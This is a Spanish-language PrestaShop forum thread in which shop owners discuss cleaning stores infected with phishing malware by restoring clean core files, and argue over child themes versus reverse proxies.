Pues a mi me ha pasado en dos tiendas que no estaban infectadas cuando actualice pero he encontrado la manera de solucionarlo rápida sencilla y definitivamente (no han vuelto a infestarse, de momento, tras unos meses) y es tan fácil como cñdescargar la versión limpia de prestashop y eliminando las carpetas del servidor y poniendo las nuevas (no reescribir ya que puede haber archivos nuevos y estar ahí el problema), ojo no todas, yo lo hago con todas menos:

Módulos 

Themes

Override

Mails (si tienes alguno personalizado) 

Y haciendo copia del parameters  y translations dentro de la carpeta app para luego de cambiar las carpetas volverlos a meter. No incluir la carpeta ni archivos de install y cambiar también todos los archivos fuera de carpeta de la raíz, excepto httaccess robots site map y si tienes algún otro archivo de enlace tipo shopping validación de propiedad de Google etc

 

Eso si, yo tengo todo actualizado tanto versión de prestashop como módulos siempre y eliminado el módulo de 1click (lo instalo solo cuando es necesario) pues parece k por ahí entran muchas cosas. 

 

A si que no se hasta que punto con la versión 1.6 te funcionará y si sera algo a largo plazo. 

 

Un saludo. 

Link to comment
Share on other sites

16 hours ago, LieBM said:

6. USAR temas hijo (Child theme) para vuestras modificaciones en los .tpl, dejad siempre la plantilla padre intacta. De esta manera si os infectan la tienda, se podrá desinfectar haciendo una instalación limpia de la tienda, instalando nuevamente la plantilla padre y solamente revisando los pocos archivos modificados en la plantilla hijo.

Usar un Child Thema emite solamente la falta de profesionalidad. Me parece mala idea desde un punto de vista de posicionamiento. Mejor es utilizar un Reverse IP set UP como recomienda nginx:

Quote

Seguridad y anonimato: al interceptar las solicitudes dirigidas a sus servidores backend, un servidor proxy inverso protege sus identidades y actúa como una defensa adicional contra los ataques de seguridad. También garantiza que se pueda acceder a varios servidores desde un único localizador de registros o URL, independientemente de la estructura de su red de área local.

Hay mas control y menos vulnerabilidad. Servicios como tales cuestan pero no cuestan el mundo. Preparar un servidor dedicado o un VPS rondea los $150. Viene con custom forked panel. Se puede ajustar las restricciones de acceso para cada solicitud, aplicar límites de velocidad y equilibrio de carga para que un posible ataque no derribe toda su infraestructura.

Especialmente el aspecto de equilibrio de carga (load balance) es clave. Además, el único servidor visible para Internet es el proxy inverso, por lo que no es una tarea trivial mapear toda la estructura de su servidor como lo sería si los expusiera todos.

 

On 9/7/2022 at 10:38 AM, gusman126 said:

Tengo que decirlo, no entiendo como no se busca a un profesional para limpiar correctamente una tienda, Sabeis el riesgo que sea denunciado por robo de datos y vulnerabilidad y la posible denuncia? No solo lo digo por este hilo, lo digo porque he visto mas casos y algunos quieren intentar limpiar ellos, no lo digo por que me contraten y me paguen, lo digo porque me parece una barbaridad que haya gente que se la sude y no este preocupada.

Es muy correcto, el que gana con una tienda debe ocuparse de las ventas y no de la tecnologia de su tienda.

Edited by Nickz (see edit history)
Link to comment
Share on other sites

1 hour ago, Nickz said:

Usar un Child Thema emite solamente la falta de profesionalidad. Me parece mala idea desde un punto de vista de posicionamiento. Mejor es utilizar un Reverse IP set UP como recomienda nginx:

Hay mas control y menos vulnerabilidad. Servicios como tales cuestan pero no cuestan el mundo. Preparar un servidor dedicado o un VPS rondea los $150. Viene con custom forked panel. Se puede ajustar las restricciones de acceso para cada solicitud, aplicar límites de velocidad y equilibrio de carga para que un posible ataque no derribe toda su infraestructura.

Especialmente el aspecto de equilibrio de carga (load balance) es clave. Además, el único servidor visible para Internet es el proxy inverso, por lo que no es una tarea trivial mapear toda la estructura de su servidor como lo sería si los expusiera todos.

 

Es muy correcto, el que gana con una tienda debe ocuparse de las ventas y no de la tecnologia de su tienda.

No entiendo que tiene que ver hacer uso del Child Theme en temas de posicionamiento. Usar Child Theme es como USAR overrides en temas de código. No tiene nada que ver con el posicionamiento. Cuando menciono hacer uso de temas hijos es para que en caso de restaurar archivos originales, se pueda hacer de forma más efectiva en la plantilla si se usa un tema hijo para las modificaciones en vez de modificar el tema principal...pero vuelvo a repetir, no afecta al SEO tal y lo que dices....

Es como decir que el uso de código PHP en overrides afecta al SEO...quien sea programador me entenderá.

Link to comment
Share on other sites

1 hour ago, LieBM said:

No tiene nada que ver con el posicionamiento.

tu puedes creer que te da la gana.

Sitios que quieren gozar autoridad requieren una forma professional. es decir tendran un equipo o servicio que monitorea la tienda. Los que promueven el uso de los child themes son las compañias que se benefician de los propietarios que manejan sus propias tiendas y son seguidores de Google. Sigue a google y haga que te dice, verás que solamente hay 10 cupos por cada SERP. 

Edited by Nickz (see edit history)
Link to comment
Share on other sites

1 hour ago, Nickz said:

tu puedes creer que te da la gana.

Sitios que quieren gozar autoridad requieren una forma professional. es decir tendran un equipo o servicio que monitorea la tienda. Los que promueven el uso de los child themes son las compañias que se benefician de los propietarios que manejan sus propias tiendas y son seguidores de Google. Sigue a google y haga que te dice, verás que solamente hay 10 cupos por cada SERP. 

No hace falta que me presente. Llevo programando para PrestaShop desde la 1.4 y tus contestación, lo siento pero no logro entenderlas. No voy a entrar en polémica, solamente he dado una recomendación para facilitar el reposicionamiento de archivos originales en caso de infección. No voy a entrar a valorar tus contestaciones, tampoco desprestigies las mías ya que iban orientadas a otro tema muy bien distinto al que argumentas y que sigo sin entender.

Link to comment
Share on other sites

Estimado MentiraBM, gracias por el post y tus recomendaciones, muy bueno!!

y es así invertir tiempo y dinero en un sitio ya desactualizado tratando de parcharlo o repararlo, parece no ser la mejor opción ya que los resultados no siempre son los que deseamos, lamentablemente el sitio en cuestión tienen muchos años, funcionando y a pasado por varias manos, esto hace que sea muy difícil migrarlo, y por otro lado quedo muy pesado en cuanto al tamaño de base de datos 1,5Gb la carpeta de img 30gb, todo esto hace que sea complicado su manipulación y migración. 

como que quede atrapado en mi versión de prestashop 1.6.1.24, pero bueno estoy trabajando en un sitio nuevo, tratando de tener el aprendizaje del anterior, para no volver a quedar en la misma situación, pero en el mientras tanto tengo que tratar de mantener el actual hasta, tener el nuevo listo.

así que si alguno sabe como sacar o donde graba, crea el archivo nuevo esta versión del phishing, le agradezco la información.  

  • Thanks 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...